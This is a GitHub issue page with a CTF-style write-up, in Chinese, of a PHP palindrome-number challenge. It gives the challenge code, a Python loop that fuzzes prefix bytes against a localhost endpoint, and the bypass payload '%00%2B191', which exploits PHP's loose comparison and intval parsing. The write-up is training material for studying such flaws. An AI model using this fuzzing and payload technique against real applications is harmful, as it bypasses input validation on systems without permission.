We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
http://127.0.0.1/Php_Bug/02.php?number=%00%2B191 %2B解析后为+,‘+191'=='191'且intval('191+')==191 (这道题解题思路如下
http://127.0.0.1/Php_Bug/02.php?number=%00%2B191
<?php function is_palindrome_number($number) { $number = strval($number); //strval — 获取变量的字符串值 $i = 0; $j = strlen($number) - 1; //strlen — 获取字符串长度 while($i < $j) { if($number[$i] !== $number[$j]) { return false; } $i++; $j--; } return true; } $a = trim($_GET['number']); var_dump(($a==strval(intval($a)))&(intval($a)==intval(strrev($a)))&!is_palindrome_number($a)) ?>
Fuzzing代码如下:
import requests for i in range(256): rq = requests.get("http://127.0.0.1/vuln/CTF/1/index.php?number=%s191"%("%%%02X"%i)) if '1' in rq.text: print "%%%02X"%i
Fuzzing结果如下:
%0C %2B
The text was updated successfully, but these errors were encountered:
学习了
Sorry, something went wrong.
No branches or pull requests
http://127.0.0.1/Php_Bug/02.php?number=%00%2B191
%2B解析后为+,‘+191'=='191'且intval('191+')==191
(这道题解题思路如下
看上述条件,条件4需要加字符但是加了之后需要满足2,3这两个条件所以就可以在原题目中简化出2,3,4来进行Fuzzing,简化后后端代码如下:
Fuzzing代码如下:
Fuzzing结果如下:
The text was updated successfully, but these errors were encountered: